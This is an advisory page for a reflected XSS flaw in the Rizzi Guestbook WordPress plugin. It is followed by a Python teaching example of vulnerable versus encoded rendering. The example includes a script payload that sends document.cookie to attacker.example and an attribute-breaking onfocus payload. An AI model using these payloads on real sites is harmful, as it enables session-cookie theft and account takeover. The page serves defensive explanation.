CVE-2025-26573
Published: 26 March 2025
Summary
CVE-2025-26573 is a high-severity reflected Cross-site Scripting (CWE-79) vulnerability in the Rizzi Guestbook WordPress plugin, affecting versions up to and including 4.0.1. Its CVSS v3.1 base score is 7.1 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique JavaScript (T1059.007); ranked at the 49.9th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)
- SI-10 (Information Input Validation): directly addresses the improper neutralization of input by validating guestbook user input on the server before it is used, so that script-bearing values are rejected rather than reflected.
- SI-15 (Information Output Filtering): prevents the reflected XSS itself by encoding untrusted input for the HTML context it is written into (text node, attribute value) before the page is generated; this is the primary defence, since validation alone cannot anticipate every payload.
- SI-2 (Flaw Remediation): mitigates the flaw in Rizzi Guestbook <= 4.0.1 itself through timely identification, reporting and patching of the vulnerable plugin.
MITRE ATT&CK Enterprise Techniques
Why these techniques?
Reflected XSS runs attacker-supplied JavaScript in the victim's browser under the origin of the WordPress site, which is T1059.007 (JavaScript) directly. Once running, that script can drive the victim's authenticated session (T1185, Browser Session Hijacking), read any session cookie not protected by the HttpOnly flag (T1539, Steal Web Session Cookie) and replay it to act as the victim (T1550.004, Web Session Cookie), matching the impacts described for this CVE.
NVD Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in JamRizzi Technologies Rizzi Guestbook rizzi-guestbook allows Reflected XSS. This issue affects Rizzi Guestbook: from n/a through <= 4.0.1.
Deeper analysis
CVE-2025-26573 is an Improper Neutralization of Input During Web Page Generation vulnerability, classified as reflected Cross-site Scripting (XSS) under CWE-79, in the Rizzi Guestbook plugin (rizzi-guestbook) for WordPress from JamRizzi Technologies. All versions up to and including 4.0.1 are affected (NVD lists the lower bound as n/a). The issue was published on 2025-03-26 with a CVSS v3.1 base score of 7.1 (High), vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L.
The vector reads as remotely reachable (AV:N) with low complexity (AC:L) and no privileges (PR:N), but it requires user interaction (UI:R): the victim has to open an attacker-supplied link so that the payload is reflected back by the guestbook page. Scope is changed (S:C) because the vulnerable component is the plugin on the web server while the impacted component is the victim's browser, where the injected JavaScript runs with the site's origin. From there the attacker can read session cookies that lack the HttpOnly flag, issue requests to the site as the victim, or alter the rendered page, which is why confidentiality, integrity and availability are each rated Low.
The primary advisory reference is Patchstack's entry for the XSS in the WordPress Rizzi Guestbook plugin up to version 4.0.1. Security practitioners should check that source for the fixed release, if one has been published, and for any interim workarounds.
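The rendering pattern behind the NVD description and the two controls listed under Mitigating Controls (input validation and output encoding), shown side by side as an added example. This is not code from the Rizzi Guestbook plugin, which is PHP; it is a Python stand-in written for this page, and the `author` parameter, the `blog.example` URL, the page layout and both payloads are constructed for illustration. It also shows the half-fix practitioners most often ship (escaping `<`, `>` and `&` but not quotes) and why an attacker does not need a single `<` to get an event handler into an attribute.

```python
"""Reflected XSS (CWE-79) in a guestbook-style page: vulnerable, partly fixed
and hardened rendering side by side. Added example for this page; NOT the
Rizzi Guestbook plugin's code. Parameter name, URL and payloads are assumed."""
import html
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, quote, urlsplit

# Constructed payloads (not taken from any advisory).
# 1) Closes the attribute, then adds a <script> element.
SCRIPT_PAYLOAD = '"><script>fetch("https://attacker.example/?c="+document.cookie)</script>'
# 2) Never uses '<': it closes the attribute value and adds an event handler,
#    so escaping only < > & does not stop it.
ATTR_PAYLOAD = '" onfocus="alert(document.cookie)" autofocus="'


def craft_url(author: str, base: str = "https://blog.example/guestbook/") -> str:
    """The link an attacker sends to the victim (reflected XSS needs the click: UI:R)."""
    return base + "?author=" + quote(author, safe="")


def get_author(url: str) -> str:
    """What the page handler reads back from the request URL."""
    return parse_qs(urlsplit(url).query).get("author", [""])[0]


def _page(author_fragment: str) -> str:
    """Shared template: the value lands in a text node and in a quoted attribute."""
    return (
        f"<p>Thanks for signing our guestbook, {author_fragment}!</p>\n"
        f'<input type="text" name="author" value="{author_fragment}">'
    )


def render_vulnerable(author: str) -> str:
    """CWE-79: raw user input written straight into the page."""
    return _page(author)


def render_partially_escaped(author: str) -> str:
    """Common half-fix: escapes < > & but leaves quotes, so the attribute is still open."""
    return _page(html.escape(author, quote=False))


def render_encoded(author: str) -> str:
    """SI-15: encode for the HTML context, quotes included, so attribute values stay closed."""
    return _page(html.escape(author, quote=True))


# SI-10: allow-list what an author name may contain. This narrows the attack
# surface but is not the primary defence; output encoding is.
_AUTHOR_RE = re.compile(r"[\w .,'-]{1,64}")


def is_valid_author(author: str) -> bool:
    return _AUTHOR_RE.fullmatch(author) is not None


def validate_author(author: str) -> str:
    if not is_valid_author(author):
        raise ValueError("author must be 1-64 letters, digits, spaces or . , ' -")
    return author


def render_hardened(author: str) -> str:
    """SI-10 + SI-15 together: reject what is clearly not a name, encode the rest."""
    return render_encoded(validate_author(author))


class _ActiveContentFinder(HTMLParser):
    """Tokenises markup the way a browser would and records what would execute."""

    def __init__(self) -> None:
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.hits.append("<script> element")
        for name, _value in attrs:
            if name.startswith("on"):
                self.hits.append(f"{name} handler on <{tag}>")


def active_content(markup: str) -> list:
    """Script elements and event-handler attributes a browser would run in this markup."""
    finder = _ActiveContentFinder()
    finder.feed(markup)
    finder.close()
    return finder.hits


if __name__ == "__main__":
    for label, payload in (("script", SCRIPT_PAYLOAD), ("attribute", ATTR_PAYLOAD)):
        author = get_author(craft_url(payload))
        print(f"{label} payload, vulnerable:  {active_content(render_vulnerable(author))}")
        print(f"{label} payload, partial fix: {active_content(render_partially_escaped(author))}")
        print(f"{label} payload, encoded:     {active_content(render_encoded(author))}")
        print(f"{label} payload, passes SI-10 validation: {is_valid_author(author)}")
```

In a WordPress plugin the encoded branch corresponds to `esc_html()` for text nodes and `esc_attr()` for attribute values, with `sanitize_text_field()` covering the validation step. The partial-fix branch is the caveat worth remembering: escaping has to match the context the value is written into, and an attribute value can be escaped from without any `<` in the payload.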
Details
- CWE(s)